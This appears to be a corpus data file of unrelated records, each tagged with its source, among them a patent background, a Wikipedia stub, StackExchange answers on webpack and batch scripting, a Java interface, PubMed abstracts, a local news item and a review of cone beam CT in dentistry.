text
stringlengths
0
6.48M
meta
dict
The field of the present invention is cosmetic surgery. In recent years, laser technology has been utilized in a variety of applications in industry, surveying, communications and the medical field. In the field of cosmetic surgery, however, standard procedures typically involve extensive use of scalpels for incising, dividing and resecting tissue. Depending upon the particular procedure, disadvantageous complications may result including scarring, nerve damage and reduced blood flow to the affected area which can result in skin slough. For example, to remove glabellar frown lines (between the eyebrows) and forehead wrinkles, standard cosmetic surgical technique involves an extensive procedure called a forehead lift which entails a large incision that extends from ear to ear over the top of the forehead. The forehead lift is particularly disadvantageous because it opens the patient up widely requiring the physician to stop bleeders and risk cauterizing nerves. Since this procedure creates a large thin skin flap and reduces the blood supply to the skin, there is also an increased risk of skin slough and alopecia (balding). An alternate procedure for removing glabellar frown lines and forehead wrinkles is collagen treatment. However, this treatment is temporary at best and also involves a risk of allergic reaction. Moreover, collagen has been reported to cause autoimmune disease and blindness.
{ "pile_set_name": "USPTO Backgrounds" }
2018 Veldhoven Open The Dynamic Billard Veldhoven Open 2018 (sometimes known as the 2018 Netherlands Open) was the third Euro Tour 9-Ball pool event in 2018. The event was won by Austria's Mario He who defeated Albania's Eklent Kaçi 9–8 in the final. By making the final, Eklent had made the semifinal or better of four straight events. The previous years champion Ruslan Tschinachow did not reach the last 32 stage. Tournament format The event saw a total of 228 players compete, in a double-elimination knockout tournament, until the last 32 stage; where the tournament was contested as single elimination. Prize fund The tournament prize fund was similar to that of other Euro Tour events, with €4,500 for the winner of the event. Tournament results References External links Category:Euro Tour Category:2018 Euro Tour events
{ "pile_set_name": "Wikipedia (en)" }
Team: Categories Finance Director(IMCA, CMC) Áine joined the firm in 1989 and quickly moved upwards to Financial Controller in 1992 and then onto her current role as Finance Director. Áine takes the lead in overseeing the firm's finances - a position that plays to her strengths in data-interpretation, skillful resource-planning and an unparalleled knowledge of the firm's systems and operations. This knowledge is brought to bear in her work with the management team, where she's involved in business development, setting and measuring KPIs, and ensuring that remedial action is taken if required. It all adds up; with Áine in charge of the firm's financial reporting, the books will always be balanced. Favourite expression?“You’re not good, you’re great!” (a confidence-booster borrowed from her Dad)Most likely to be seen reading?Anything by US crime writer Karin Slaughter (been known to order them hot off the presses!)The Movie of Your Life – who’d play you?Meryl Streep (no hesitation), with particular reference to “Mamma Mia”Where you’ll never see Áine?Zip-lining or abseiling down a cliff-face – not in a million.Happy Place?Meeting up with my five besties and putting the world to rights – we’ve known each other since our first year in secondary school and decades later, the chat hasn’t run out!Desert Island Disc(s)?“You’ve Got a Friend” by James Taylor and anything by Ella Fitzgerald.That Thing You’d Save in a Fire?A silver-framed, smiling photo of my Mum & Dad, taken on holidays in the StatesÁine IRL (In Real Life)If Áine’s not with family and friends, you’ll find her in relaxed mode with the phone on silent (she’ll get back to you), the hubby safely on the golf-course, her latest Karin Slaughter in hand and some Ella playing in the background!
{ "pile_set_name": "Pile-CC" }
Fortworthology Goes To Portland I’ve been to Portland quite a few times, and I really enjoy the transit variety there. Buses, streetcars, MET train (free in downtown, has bike hooks), tons of bike lanes, and even bike lanes on bridges. Portland has a “Last Thursday” art-walk in Portland which is now car free, after the city agreed to repeating street closures. For a Texan, the experience can be pretty overwhelming, and the openness towards multi-modal transit and new urbanism contributes to Portland’s appeal to the creative class. 2 thoughts on “Fortworthology Goes To Portland” I wish the city I live in in Tasmania had more bike lanes, I stick to the footpaths mostly on the way to & from work because the roads are to deadly as most drivers here seem to have the opinion that cyclists shouldn’t be on the road
{ "pile_set_name": "Pile-CC" }
<div class="settings__general-prv settings__general-prv-{{name}}"> {{#if desc}}<div class="settings__general-prv-desc">{{res desc}}</div>{{/if}} <div class="settings__general-prv-fields"> {{#each fields as |field ix|}} {{#ifeq type 'select'}} <div> <label for="settings__general-prv-field-sel-{{id}}">{{res title}}:</label> <select class="settings__select input-base settings__general-prv-field settings__general-prv-field-sel" id="settings__general-prv-field-sel-{{id}}" data-id="{{id}}"> {{#each options as |title val|}} <option value="{{val}}" {{#ifeq ../value val}}selected{{/ifeq}}>{{res title}}</option> {{/each}} </select> </div> {{else}} <label for="settings__general-prv-field-txt-{{id}}">{{res title}}:</label> {{#if desc}}<div class="settings__general-prv-field-desc muted-color">{{res desc}}</div>{{/if}} <input type="{{type}}" class="input-base settings__general-prv-field settings__input settings__general-prv-field-txt" id="settings__general-prv-field-txt-{{id}}" autocomplete="off" value="{{value}}" data-id="{{id}}" {{#if placeholder}}placeholder="{{res placeholder}}"{{/if}} {{#if required}}required{{/if}} {{#if pattern}}pattern="{{pattern}}"{{/if}} /> {{/ifeq}} {{/each}} </div> </div>
{ "pile_set_name": "Github" }
Q: Identity Server: Getting Token using APIs and avoiding Identity Login I am using Identity Server 4 and trying to connect users logging from angular app (using Implicit Flow) to allow them to access other apis. I am trying to avoid getting users landed in ID Sever login page. I need to place the login form in the angular app and communicate with identity server through endpoints (skipping step 2 below) The is flow of communication now: User requests to login: I will call the Authorize Endpoint with needed params Then Identity Server renders the login form and asks for credentials After credentials validation the user is directed back to angular app I am trying to communicate with connect\token endpoint directly (passing all required params including username and password) to get a token, however it seems it needs a secret which is not applicable in Implicit Flow case. Is there a way to communicate just through APIs and return a token and in case i need to change the implicit which type should i use? A: I am trying to avoid getting users landed in ID Sever login page. By definition the implicit flow contradicts this requirement.
{ "pile_set_name": "StackExchange" }
If you can't make it to the game you can listen to full match commentary, or watch the game if you are an International fan, on IFollow Shrews or download the app here to listen if you are out and about - IFollow App. Travel - There are a number of matchday buses from around the county and buses from the town centre, details here Matchday Travel Plan. There a number of parking options in and around the stadium, these can be viewed here Matchday Parking Options.
{ "pile_set_name": "Pile-CC" }
We have previously reported that induction of EGFR and erbB2 in response to antihormones may provide an early mechanism allowing breast cancer cells to evade the growth inhibitory action of such therapies and ultimately drive resistant growth. More recently, another member of the erbB receptor family, erbB3, has been implicated in antihormone resistance in breast cancer. In the present study we have investigated whether induction of erbB3, and related family member erbB4, may provide an alternative resistance mechanism to antihormonal action in a panel of four ER-positive breast cancer cell lines. MCF-7, T47D, BT474 and MDAMB361 cell lines were exposed to fulvestrant (100 nM) for 7 days, and effects on erbB3/4 signalling and growth were assessed. Effects of the erbB3/4 ligand heregulin-β1 were also examined in the absence and presence of fulvestrant. Fulvestrant potently reduced ER expression and transcriptional activity and significantly inhibited growth in all four cell lines. However, alongside this inhibitory activity, fulvestrant also consistently induced protein expression and activity of erbB4 in the four cell lines and also promoted erbB3, erbB2 and EGFR protein expression and activity in MCF-7 and T47D cells. Consequently, fulvestrant treatment sensitised each cell line to the actions of heregulin-β1 with enhanced erbB3/4-driven signalling activity and significant increases in cell proliferation being observed when compared with untreated cells. Indeed, in T47D and MDAMB361, heregulin-β1 was converted from a ligand having negligible or suppressive growth activity into one that potently promoted cell proliferation. Consequently, fulvestrant-induced growth inhibition was completely overridden by heregulin-β1 in all four cell lines. In conclusion, these findings would suggest that although antihormones, such as fulvestrant, may have potent acute growth inhibitory activity in ER-positive breast cancer cells, their ability to induce and sensitize cells to growth factors, such as heregulins, may serve to reduce and ultimately limit their inhibitory activity.
{ "pile_set_name": "PubMed Central" }
Q: Webpack: how to bundle entries to multiple common chunks with CommonsChunkPlugin? Say I have two pages Page1 and Page2, both of them use some library(vendors) like jquery backbone which I want to be extracted as a single file, then I want the shared modules(exclude the vendors) to be extracted in another single file, this is the webpack config: function listFiles(srcpath) { return fs.readdirSync(srcpath).filter(function (file) { return fs.statSync(path.join(srcpath, file)).isDirectory(); }); } var createEntry = function (src) { var dest = { vendor: ["backbone", "underscore"] }; var files = listFiles(src); files.forEach(function (dir) { var name = dir; dest[name] = src + "/" + dir + "/entry.js"; }); return dest; }; //each sub directory contains a `entry.js` as the entry point for the page var entries = createEntry("./app/pages");// {vender:['jquery','backbone'],page1:'src/page1/entry.js',page2:'src/page2/entry.js' } var config = { resolve: { root: path.resolve('./app/'), extensions: ['', '.js'] }, plugins: [ new webpack.optimize.CommonsChunkPlugin("vendor", "vendor.js", Infinity), new webpack.optimize.CommonsChunkPlugin({ name: 'common', filename: 'common.js', minChunks: 2 }) ], entry: entries, output: { path: './../main/webapp/static/dist', filename: '[name].js', publicPath: '/static/dist' } }; module.exports = config; However with the above config: common.js contains webpack runtime, page1.js contains page1 specified modules and shared modules page2.js contains page2 specified modules and shared modules Which means page1.js and page2.js contains too many repeat codes. Then I tried to change the config: var entries = createEntry("./app/pages"); var chunks = []; for (var k in entries) { if (k === 'vendor') continue; chunks.push(k); } new webpack.optimize.CommonsChunkPlugin("vendor", "vendor.js", Infinity), new webpack.optimize.CommonsChunkPlugin({ name: 'common', filename: 'common.js', minChunks: 2, chunks:chunks }), Then common.js contains the webpack runtime and the vendor libraries, and the shared modules vendor.js contains the webpack runtime and the vendor libraries. page1.js contains page1 specified modules page2.js contains page2 specified modules It seems it get closer, but the common.js should not contain the vendors Anything wrong? A: If you want multiple common chunk bundles, you'll have to specify all chunks details for each common bundle like shown in the example: var config = { entry: { vendor: ["backbone", "underscore"], common: "./app/pages/common/entry.js", page1: "./app/pages/page1/entry.js", page2: "./app/pages/page2/entry.js" }, plugins: [ new webpack.optimize.CommonsChunkPlugin({ name: "vendor", chunks: ["vendor"] }), new webpack.optimize.CommonsChunkPlugin({ name: "common", chunks: ["common"] }) ] }; Note that the chunks option of CommonsChunkPlugin refers to the name of the entries you target. As you want to split vendor from common, you have to explicitly say that you only want vendor entry in vendor common-chunk and same for common.
{ "pile_set_name": "StackExchange" }
A. Writing Task 1: Comparing and Contrasting In this lesson I will provide you with some useful phrases you can use when you state contrasts and similarities in the diagram (or chart, graph etc.) of your IELTS A. Writing Task 1. Obviously, you can also use these phrases in any writing when you refer to similarities and differences , but let’s go and check them out for Task 1 along with examples. Firstly, let’s talk about similarities! Both -It is obvious from the diagram that both value X and value Z have increased/dropped in 2010. –Both X and Z values have increased/dropped in 2010. Similarly/Likewise -It is clear that the X value is steadily increasing over the years. Similarly/Likewise, the Z value follows the same increasing trend. In the same way -Value X dropped in 2014 in the same way thatvalue Z dropped in 2012 -Value X dropped in 2014 in the same way as value Z dropped in 2012. Similar trend -Value Z follows a similar trend with value X in the years 2013 and 2014. The following are some useful phrases that you will use when you want to refer to differences: On the one hand-On the other hand –On the one hand, value X is the only value that steadily increases from 2010 to 2012 making the company the most profitable one. On the other hand, it abruptly drops in 2014 and becomes the least competitive. While While all values increase in 2014, the X value significantly decreases. -Value Z shows a steady performance throughout the years in contrast to value X which is unstable. -Value Z shows a steady performance throughout the years. By contrast, value X is unstable. For extra clarifications, you can also watch the video: Success Stories! Thanku sooo much mam I got 7 bands, only with the help of your videos! Arsh Sandhu Hi Dori, Hope your are doing well. This time I'm not troubling you with any of my last minute queries. Instead, I'm here to share with you some good news with you. I have got my IELTS result today and I have finally cleared my IELTS GT exam ( it was on 5th March) with an overall bandscore of 8! L - 7.5, W- 7.5, R- 8.0, S- 8.0 I must express my gratitude towards you and your unconditional support throughout my exam preparation. You have been always available to sort my last minute silly queries with your instant response. Thanks once again for your patronage and three cheers to your site, videos. Yours Sincerely, Zarina Siddique
{ "pile_set_name": "Pile-CC" }
Q: switch case with the user given array elements - batch I need the solution to the following problem in batch file, The user gives the input with a space in between every next input element. The inputs need to be stored in an array as array elements. The input has to be taken as the case name and the particular case need to be executed. Hence every case with the name of the array element need to be executed The array size is not predetermined. It varies as the user may give any number of inputs The algorithm needs to be like this, User input numbers are 1 2 4 6 which are stored in the array a[i] a[i] = {1,2,4,6} for i = 1 to len(a[i]) CALL :CASE_%a[i]% # jump to :CASE_1, :CASE_2, etc. :CASE_1 Echo “am in case1” :: go to the for loop :CASE_2 Echo “am in case2” :: go to the for loop :CASE_3 Echo “am in case3” :: go to the for loop :CASE_4 Echo “am in case4” :: go to the for loop :CASE_5 Echo “am in case5” :: go to the for loop :CASE_6 Echo “am in case6” :: go to the for loop :CASE_7 Echo “am in case7” :: go to the for loop :CASE_8 Echo “am in case8” :: go to the for loop End for Case_1, Case_2, Case_4, Case_6 only need to be executed as the input is 1 2 4 6. Is this possible in batch file? A: I will split the problem in three parts. Putting the data into the array, getting the data from the array and simulating a case instruction, not present in batch. @echo off setlocal enableextensions enabledelayedexpansion set /p "data=Input data:" Let's assume the user inputs only numeric values (to avoid all the necessary check and look only to the problem) as indicated, space separated. Put them into a "array". No, arrays are not present in batch scripts, but can be simulated giving to variables the proper names. set "arrayLength=0" for %%e in (%data%) do ( set /a "arrayLength+=1" set "a[!arrayLength!]=%%e" ) This iterates over the input data, and for each element, a counter is incremented and a variable named a[+counter value+] is created. No, it is not an array, just a variable with a name to allow us simulate the array sintax. As the counter (arrayLength) is beeing changed inside the loop, delayed expansion is needed to read this changed value, and sintax for variable read changes from %var% to !var! Now, data is in the "array". We are going to iterate over the "array", checking its contents. for /l %%i in (1 1 %arrayLength%) do ( echo element %%i is : !a[%%i]! ) The sintax to read the content of each of the elements requires delayed expansion too. In this case we are not changing the value inside the block, but the name of the readed variable is being generated dinamically in each iteration. Remember, no arrays, just variables with an adecuated name. And we generate the name using the for variable. How to test for the values of the "array"? echo Test IF for /l %%i in (1 1 %arrayLength%) do ( if "!a[%%i]!"=="1" ( echo Case 1 ) else if "!a[%%i]!"=="2" ( echo Case 2 ) else if "!a[%%i]!"=="3" ( echo Case 3 ) else if "!a[%%i]!"=="4" ( echo Case 4 ) else if "!a[%%i]!"=="5" ( echo Case 5 ) else if "!a[%%i]!"=="6" ( echo Case 6 ) else ( echo NO CASE ) ) This iterates over the "array" and uses a cascaded IF sintax to check for the allowed values. It's easy to code, fast but not the most comfortable to maintain if there are frequent changes to the cases. An alternative to the IF cascade is the usage of subroutines. Depending on the value of the "array" element, call one label or other. Just name the labels adequately. Then you can test if the label/subroutine exists and then call it. Or you can call it directly without previous check and test for errors in the call that will indicate the label does not exist. Or a table of routines can be defined. For a sample, if the following labels are defined :case[1] echo Case 1 goto :eof :case[2] echo Case 2 goto :eof :case[3] echo Case 3 goto :eof :case[4] echo Case 4 goto :eof :case[5] echo Case 5 goto :eof :case[6] echo Case 6 goto :eof the code to call this subroutines with a previous check of existence in batch file (%~f0 is the current batch file with full path) could be rem Use labels in batch with previous test of existence for /l %%i in (1 1 %arrayLength%) do ( findstr /l /c:":case[!a[%%i]!]" "%~f0" > nul 2>nul if not errorlevel 1 ( call :case[!a[%%i]!] ) else ( echo NO CASE ) ) This uses findstr to read the current batch file searching for the :case[n] label. On no error, the label has been found and the call is made. But having to read the batch file to test for the label existence is not the fastest operation. To not check for label existence and directly do the call, this code can be used rem Use labels in batch without check for /l %%i in (1 1 %arrayLength%) do ( ver>nul call :case[!a[%%i]!] 2>nul if errorlevel 1 echo NO CASE ) The 'ver>nul` line symply ensures errorlevel is cleared before calling the subroutine. The call is made and errorlevel is checked. But there is no way of knowing if the errorlevel comes from the call instruction or from the inside of the called subroutine. Other option is to have a table of rutines to call for each of the posible values of the elements in the array. So if a table for each of the allowed elements is created, pointing the the labels of the subroutines set "func[1]=:case[1]" set "func[2]=:case[2]" set "func[3]=:case[3]" set "func[4]=:case[4]" set "func[5]=:case[5]" set "func[6]=:case[6]" The following code can call the adecuated subroutine, cheching if the function for the value is defined for /l %%i in (1 1 %arrayLength%) do ( for %%v in (!a[%%i]!) do if defined func[%%v] ( call !func[%%v]! ) else ( echo NO CASE ) ) The inner for is needed to get a reference to the value inside the "array" to be used to access the name of the function inside the func "array". And ..... anything better anyone could imagine. After all this, Which code should be used? What works for you. It all depends of the real problem to solve The IF cascade is fast and easy but for a problem with frequent changing cases, is harder to maintain. The findstr is time consuming. The call without check can be a real nigntmare. The function table is in the middle. Is not as fast as having all the code in the block as in the IF solution, but is faster than the findstr while checking for subroutine definition. It is not hard to code, but for small problems is innecesary. For simple cases, IF constructs are all you need. For complex problems, if the code is long and cases needs to be changed, added, ... the function table makes things easier. So, it can result in @echo off setlocal enableextensions enabledelayedexpansion set /p "data=Input data:" set "arrayLength=0" for %%e in (%data%) do ( set /a "arrayLength+=1" set "a[!arrayLength!]=%%e" ) rem func[ allowedValue ] = label to call set "func[1]=:handleCase_1" set "func[2]=:handleCase_2" set "func[3]=:handleCase_3" set "func[4]=:handleCase_4" set "func[5]=:handleCase_5" set "func[6]=:handleCase_6" for /l %%i in (1 1 %arrayLength%) do ( for %%v in (!a[%%i]!) do if defined func[%%v] ( call !func[%%v]! ) else ( echo NO CASE ) ) for /l %%i in (1 1 %arrayLength%) do ( if "!a[%%i]!"=="1" ( echo Case 1 rem Or, we can rem call :handleCase_1 ) else if "!a[%%i]!"=="2" ( echo Case 2 ) else if "!a[%%i]!"=="3" ( echo Case 3 ) else if "!a[%%i]!"=="4" ( echo Case 4 ) else if "!a[%%i]!"=="5" ( echo Case 5 ) else if "!a[%%i]!"=="6" ( echo Case 6 ) else ( echo NO CASE ) ) endlocal exit /b :handleCase_1 echo Case 1 goto :eof :handleCase_2 echo Case 2 goto :eof :handleCase_3 echo Case 3 goto :eof :handleCase_4 echo Case 4 goto :eof :handleCase_5 echo Case 5 goto :eof :handleCase_6 echo Case 6 goto :eof
{ "pile_set_name": "StackExchange" }
697 F.2d 289 Cookv.Bates 81-7892 UNITED STATES COURT OF APPEALS Second Circuit 5/20/82 1 S.D.N.Y. AFFIRMED
{ "pile_set_name": "FreeLaw" }
Residence Inn San Bernardino Features Media Pods (15 of 29) The hotel’s redesigned public spaces have been transformed into multifunctional living spaces where guests can relax or collaborate on their own terms. Complimentary Wi-Fi and private “nooks” with personal HD flat-screen televisions provide a private/public work space outside of the suite.
{ "pile_set_name": "Pile-CC" }
/* * Copyright (c) 2008, 2011, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package java.lang.management; import javax.management.ObjectName; /** * A platform managed object is a {@linkplain javax.management.MXBean JMX MXBean} * for monitoring and managing a component in the Java platform. * Each platform managed object has a unique * <a href="ManagementFactory.html#MXBean">object name</a> * for the {@linkplain ManagementFactory#getPlatformMBeanServer * platform MBeanServer} access. * All platform MXBeans will implement this interface. * * <p> * Note: * The platform MXBean interfaces (i.e. all subinterfaces * of {@code PlatformManagedObject}) are implemented * by the Java platform only. New methods may be added in these interfaces * in future Java SE releases. * In addition, this {@code PlatformManagedObject} interface is only * intended for the management interfaces for the platform to extend but * not for applications. * * @see ManagementFactory * @since 1.7 */ public interface PlatformManagedObject { /** * Returns an {@link ObjectName ObjectName} instance representing * the object name of this platform managed object. * * @return an {@link ObjectName ObjectName} instance representing * the object name of this platform managed object. */ public ObjectName getObjectName(); }
{ "pile_set_name": "Github" }
Cops cuff armed white supremacist in banana costume Indecent exposure kicks off lively afternoon in Washington Common Topics A Washington state US Marine reservist was earlier this week cuffed following a lively Tuesday afternoon which saw him dress in a child's banana costume, indecently expose himself and wave a shotgun in the street while shouting "something or other about white supremacy". Carlton Jeffery Kohnert, 21, accompanied by Anthony Marks Maybury, 21, and an unnamed 18-year-old woman, began his trip to jail by flashing at a woman at the Port Angeles Wendy's restaurant. The three then drove to Saar's Market on US Highway 101 on the east side of town where they entertained locals by "pulling 360s" in the car park. The jaunt continued through the Four Seasons Ranch neighbourhood, where banana man jumped out out the car and allegedly gave forth loudly about the superiority of the white race. Cops finally pulled the trio on a nearby highway. Sergeant Randy Pieper, of Clallam County Sheriff's department, explained to the Peninsula Daily News that Kohnert "couldn't really tell us why he was in the costume". He added: "All we know is he was drinking earlier in the day, but he didn't really have a reason for the costume." Kohnert has been charged with "reckless endangerment, aiming or discharging a weapon and indecent exposure". Maybury was collared for "investigation of reckless endangerment", while the teenage girl escaped arrest since she was apparently just along for the ride. Cops were on Tuesday awaiting a warrant to search the car since they spotted "two empty shotgun shells in the passenger seat", but Pieper was able to confirm that "the banana costume has been seized and put into evidence". ®
{ "pile_set_name": "Pile-CC" }
Effect of PJ34 on spinal cord tissue viability and gene expression in a murine model of thoracic aortic reperfusion injury. These studies were designed to determine whether PJ34, a novel Poly-ADP Ribose Polymerase Inhibitor, modulates expression of markers of stress and inflammation in the spinal cord following ischemia/ reperfusion(TAR). 129S1/SvImj mice were subjected to thoracic aortic occlusion and 48 hours of reperfusion (n = 38). EXPERIMENTAL GROUPS INCLUDED: Untreated Control (UC, n = 21); PJ34 (PJ34, n = 11) and sham (S, n = 6). At 48 hours, mice were euthanized for mRNA analysis and assessment of spinal cord viability. PJ34 improved spinal cord tissue viability following TAR (UC:53.1 +/- 6.3, PJ34:73.5 +/- 4.1% sham, p < 0.01). mRNA analysis revealed significant expression of stress response genes in UC and PJ34 treated mice. PJ34 enhanced mitochondrial activity and preserved neurologic function following TAR despite the expression of stress and pro-inflammatory markers within the spinal cord. The ongoing cord stress response in neurologically intact PJ34 treated mice may indicate the potential to develop delayed neurologic dysfunction.
{ "pile_set_name": "PubMed Abstracts" }
I[NTRODUCTION]{.smallcaps} {#sec1-1} ========================== Wilhelm C. Röntgen discovered electromagnetism in 1895 in a wavelength range (the X-rays) which became a very important diagnostic tool.\[[@ref1]\] This discovery unleashed a great source of knowledge of the human body breaking the constraints of medical science and enabling doctors to diagnose and treat pathologies accurately. It was after 14 years that X-rays were recognized in dentistry by Dr. Walkhoff, a dentist in Braunschweig, Germany. The discovery of X-rays was the basis for improved methods of scientific evaluation such as the cone beam computed tomography (CBCT). Interestingly, this technology took almost 40 years to evolve and become available for clinicians. CBCT has evolved from CT scan; a technique invented in 1967 by the British engineer Godfrey Hounsfield.\[[@ref2]\] The first prototype of clinical CBCT scanner was originally devised as a cost-effective and efficient method for obtaining cross-sectional three-dimensional (3D) images for radiotherapy and later (1982) for angiography.\[[@ref3]\] CBCT\'s commercial availability was delayed for a decade and wasfirst introduced in Europe in 1998 and the US in 2001.\[[@ref3]\] Columbia Scientific Inc., introduced 3D dental software in dentistry in 1988, and 2 years later, CBCT started to appear in dental research publications.\[[@ref4]\] With CBCT\'s introduction in dentistry, dental clinicians could not only have profound knowledge of oral pathology but could also enhance the access to a detailed view of the underlying structures and their relations. This 3D image was groundbreaking since the process of decision-making became simpler and the recognition of the bony defects from different angles became easier. The aim of this manuscript is to describe the CBCT function concept and its application in dental and maxillofacial conditions. M[ATERIALS AND]{.smallcaps} M[ETHODS]{.smallcaps} {#sec1-2} ================================================= This narrative review gathered literature from peer-reviewed articles published in indexed journals available in PubMed and other web-based resources. The article and literature used for this publication has been summarized in [Table 1](#T1){ref-type="table"}. ###### Summary of literature used for this publication ![](JISPCD-7-125-g001) A[PPLICATIONS IN DENTISTRY]{.smallcaps} {#sec2-1} --------------------------------------- ### Oral surgery {#sec3-1} An oral surgeon can analyze the size, extent, and location of a tumor or cyst, its penetration into surrounding structures, and relation to vital structures such as nerves and blood vessels \[[Figure 1](#F1){ref-type="fig"}\]. CBCT also helps in the assessment of impacted teeth and supernumerary in terms of its location and relation to vital structures.\[[@ref5]\] The clinician can also detect changes in the bony deformities related to bisphosphonate-associated osteonecrosis of the jaw, bone grafts, and paranasal sinuses; in cases of obstructive sleep apnea, it helps to form a volume surface rendering of the windpipe.\[[@ref5]\] CBCT has the ability to provide attention to details, thus, becomes the technology of choice for midface fracture cases e.g., gunshot wounds, orbital fracture management, interoperative visualization of the facial bones after fracture \[[Figure 2](#F2){ref-type="fig"}\], and intraoperative navigation during surgical procedures.\[[@ref6][@ref7][@ref8]\] ![Destruction of the body -- parasymphysis left mandibular region due to an intrabony tumor](JISPCD-7-125-g002){#F1} ![Multiple fractures involving the naso-orbitoethmoidal region, bilateral Le Fort 2 and 3 levels and a bilateral high Le Fort 1 fracture along with a left parasymphysis fracture of the mandible](JISPCD-7-125-g003){#F2} In cases of temporomandibular joint disorders and dysfunctioning related to trauma, pain, dysfunction, fibro-osseous ankylosis, detecting condylar cortical erosion, cysts, and visualization of soft tissue (ST), CBCT becomes the imaging device of choice.\[[@ref9]\] ### Implantology {#sec3-2} CBCT provides a higher degree of predictability of implant placement because of its accuracy for evaluation. The clinician can evaluate the height and width of the bone present to place an implant \[[Table 2](#T2){ref-type="table"} and [Figure 3](#F3){ref-type="fig"}\]. In peri-implantitis cases, the amount of bone surrounding the implant can be assessed previous to probing, providing such important information as radiolucency.\[[@ref10][@ref11]\] ![Use of cone beam computed tomography in planning the tridimensional placement of four implants in the anterior zone](JISPCD-7-125-g004){#F3} ###### Cone beam computed tomography used in the treatment of implantology ![](JISPCD-7-125-g005) ### Orthodontics {#sec3-3} An orthodontist can use CBCT for the assessment of the position of unerupted teeth, particularly for impacted ones, especially in cases of maxillary impacted canines where knowing exactly the tooth position results in accurate treatment planning \[[Figure 4](#F4){ref-type="fig"}\]. The angulation is appreciated well in these 3D images, which would be difficult to appreciate on conventional radiographs even when taken in two different planes. It also helps in identification of any resorption of adjacent teeth (i.e., where maxillary canines are ectopic and incisor roots are suspected of having undergone resorption).\[[@ref12]\] ![Three-dimensional view of both maxillary and mandibular arches depicting amount of bone present, craters, furcation, and crestal bone loss](JISPCD-7-125-g006){#F4} Other applications of CBCT in orthodontics are cleft palate assessment, resorption related to impacted teeth, rapid maxillary expansion, 3D cephalometry, surface imaging integration, airway assessment, age assessment, and investigation of orthodontic-associated paraesthesia.\[[@ref13]\] In cases where mini-screw implants are placed for anchorage, CBCT is used to analyze bone dimensions and precise location of placement to minimize complications.\[[@ref14]\] ### Endodontics {#sec3-4} CBCT can also be used for caries diagnosis since caries detection and depth evaluation in approximal and occlusal lesions are improved considerably. However, its application in endodontic-metallic restoration would produce artifacts reducing diagnostic accuracy.\[[@ref15]\] CBCT imaging for caries should be limited to nonrestored teeth. Sensitivity may increase with CBCT but it should not be at the cost of specificity.\[[@ref15]\] CBCT in endodontics can be used for identification and measurement of the extent of periapical lesions\[[@ref16]\] and it also differentiates solid from fluid-filled lesions (e.g., periapical granulomas from cysts) using grayscale values in the lesions.\[[@ref15]\] CBCT plays an important role in establishing successful endodontic therapy by identification of all root canals so that they can be accessed, cleaned, shaped, and obturated.\[[@ref16]\] It helps in identification of prevalence of a second mesiobuccal canal (MB2) in maxillary first molars and also multiple and accessory canals (aberrant pulpal anatomy, e.g., dens invaginatus) in any other teeth.\[[@ref15]\] It also helps in differentiation of pathosis from normal anatomy and relationships with important anatomical structures. CBCT also plays an important role in the diagnosis and management of root fractures, luxation and/or displacement, and alveolar fracture.\[[@ref17][@ref18][@ref19][@ref20][@ref21][@ref22]\] ### Periodontics {#sec3-5} In periodontics, CBCT detects the amount of bone present, craters, furcation, crestal bone loss, fenestrations, and dehiscences \[[Figure 5](#F5){ref-type="fig"}\]. In spite of its usefulness in this field, CBCT is not indicated as a routine method of imaging periodontal bone support. However, limited volume, high-resolution CBCT may be indicated in selected cases of infrabony defects and furcation lesions, where clinical and conventional radiographic examinations do not provide the information needed for management; thus, it may have a role to play in the management of complex periodontal defects for which surgery is the treatment option.\[[@ref13][@ref15]\] CBCT can also be used within a period of 1 month for postoperative defect fill or bone density evaluation, which cannot be detected through normal radiographs, and it can also replace subtraction radiography.\[[@ref15]\] ![Both permanent upper canines are impacted with the crown facing toward the palatal aspect and the roots more toward the buccal aspect](JISPCD-7-125-g007){#F5} CBCT can help in identifying bone defect size and early signs of periodontitis by assessing periodontal ligament space, measurement of gingival tissue, and the dimensions of the dentogingival unit.\[[@ref23]\] This method is called ST-CBCT and helps to visualize and measure precisely distances corresponding to the hard and STs of the periodontium and dentogingival attachment apparatus. With ST-CBCT, gingival margin and the facial bone crest, gingival margin and the cementoenamel junction (CEJ), and CEJ and facial bone crest can be determined.\[[@ref23][@ref24][@ref25]\] ### Forensic dentistry {#sec3-6} CBCT can also be applied in the field of forensic dentistry for accurate age estimation for every person of the legal system (including those who have passed away). To estimate accurate age, tooth has to be sectioned to identify morphological changes; as with age, internal layers of the tooth (dentin, cementum, and pulp) illustrate physiological and pathological changes.\[[@ref26]\] However, with CBCT, such aggressive methods are not required.\[[@ref27]\] S[AFETY CONCERNS]{.smallcaps} {#sec2-2} ----------------------------- It is paramount that as low as reasonably achievable (ALARA) principle is followed during diagnosis, as far as the radiation dose of CBCT imaging is concerned.\[[@ref28]\] Use of CBCT for examination must be justified for each patient as the examination is dose dependent; i.e., higher doses of radiation may also be applied depending on the lesion to be examined, but higher radiation increases risks. Thus, CBCT should only be used when the question for which imaging is required cannot be answered adequately by lower dose conventional (traditional) radiography.\[[@ref28]\] Therefore, it is necessary to ensure that patient doses are monitored on a regular basis and compared to agreed standards. Standard dose levels are normally referred to as diagnostic reference levels, and a dose of 4 mGy of SRL is recommended as the absorbed dose in air measured at the end of the spacer cone for a standard maxillary molar projection.\[[@ref28]\] By 1897, Kells reported that long exposures to X-rays caused a mild skin irritation, similar to sunburn, and early X-ray machines needed adjustment for each use so that the operator placed his hand between the actively radiating tube and the film plate. Kells took radiographs in this manner for 12 years, after which he developed cancerous tumors on his fingers. Thus, concerns about radiation exposure, especially when it is done once in a lifetime are inconsequential; furthermore, beyond 80 years of age, the risk becomes negligible because the latent period between X-ray exposure and the clinical presentation of a tumor would probably exceed the lifespan of a patient.\[[@ref29]\] In contrast, the tissues of younger people are more radiosensitive and their prospective lifespan is likely to exceed the latent period. 